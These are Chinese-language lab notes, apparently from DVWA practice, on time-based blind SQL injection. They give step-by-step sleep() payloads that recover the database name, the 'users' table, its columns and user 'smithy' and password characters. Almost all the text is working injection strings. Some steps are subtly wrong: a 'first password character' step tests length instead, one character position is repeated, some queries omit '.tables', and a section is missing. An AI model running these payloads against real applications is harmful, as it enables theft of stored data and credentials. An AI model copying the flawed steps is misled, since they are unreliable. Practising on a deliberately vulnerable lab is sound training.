1.判断注入类型
1 and sleep(3) 无延迟
1' and sleep(3)# 有延迟
结论:注入类型为字符串类型（数字型载荷无延迟、加单引号闭合后才出现延迟，说明参数是以字符串形式拼接进 SQL 的）
2.判断数据库名
获取数据库名长度
1' and if(length(database())=4,sleep(5),1)#
获取第一个字符d
1' and if(ascii(substr(database(),1,1))=100,sleep(5),1)#
获取第二个字符v
1' and if(ascii(substr(database(),2,1))=118,sleep(5),1)#
获取第三个字符w
1' and if(ascii(substr(database(),3,1))=119,sleep(5),1)#
获取第四个字符a
1' and if(ascii(substr(database(),4,1))=97,sleep(5),1)#
结论:数据库名为dvwa
3.数据表名
判断表的个数
1' and if((select count(table_name) from information_schema.tables where table_schema=database())=2,sleep(5),1)#
结论:dvwa有两张表
第二个数据表记录
select table_name from information_schema where table_schema=database() limit 1,1
第二个数据表名的完整字符串
substr((select table_name from information_schema where table_schema=database() limit 1,1),1)
第二个表名的完整字符串的长度
1' and if((length(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)))=5,sleep(5),1)#
结论:第二个表名的长度为5
获取第二个表的第一个字符
1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=117,sleep(5),1)#
获取第二个表的第二个字符
1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))=115,sleep(5),1)#
获取第二个表的第三个字符
1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),3,1))=101,sleep(5),1)#
获取第二个表的第四个字符
1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),4,1))=114,sleep(5),1)#
获取第二个表的第五个字符
1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),5,1))=115,sleep(5),1)#
结论:第二个表名为users
4.字段名
获取users的字段数
1' and if((select count(column_name) from information_schema.columns where table_name='users' and table_schema='dvwa')=8,sleep(5),1)#
结论:users表有8个字段
获取user字段长度
1' and if(length(substr((select column_name from information_schema.columns where table_name='users' and table_schema='dvwa' limit 3,1),1))=4,sleep(5),1)#
结论:user的长度为4
获取user的第一个字符
1' and if(ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema='dvwa' limit 3,1),1,1))=117,sleep(5),1)#
获取user的第二个字符
1' and if(ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema='dvwa' limit 3,1),2,1))=115,sleep(5),1)#
获取user的第三个字符
1' and if(ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema='dvwa' limit 3,1),3,1))=101,sleep(5),1)#
获取user的第四个字符
1' and if(ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema='dvwa' limit 3,1),4,1))=114,sleep(5),1)#
6.数据
获取smithy的passwd
密码的第一个字符
1' and if(length(substr((select password from users where user='smithy'limit 0,1),1))=112,sleep(5),1)#
密码的第二个字符
1' and if(ascii(substr((select password from users where user='smithy' limit 0,1),1,1))=97,sleep(5),1)#
密码的第三个字符
1' and if(ascii(substr((select password from users where user='smithy' limit 0,1),2,1))=115,sleep(5),1)#
7.数据
获取user记录数
1' and if((select count(user) from users)=5,sleep(5),1)#
结论:users表有5条记录
获取smithy的长度
1' and if(length(substr((select user from users limit 4,1),1))=6,sleep(5),1)#
smithy的第一个字符
1' and if(ascii(substr((select user from users limit 4,1),1,1))=115,sleep(5),1)#
smithy的第二个字符
1' and if(ascii(substr((select user from users limit 4,1),2,1))=109,sleep(5),1)#
smithy的第三个字符
1' and if(ascii(substr((select user from users limit 4,1),3,1))=105,sleep(5),1)#
smithy的第四个字符
1' and if(ascii(substr((select user from users limit 4,1),4,1))=116,sleep(5),1)#
smithy的第五个字符
1' and if(ascii(substr((select user from users limit 4,1),5,1))=104,sleep(5),1)#
smithy的第六个字符
1' and if(ascii(substr((select user from users limit 4,1),5,1))=121,sleep(5),1)#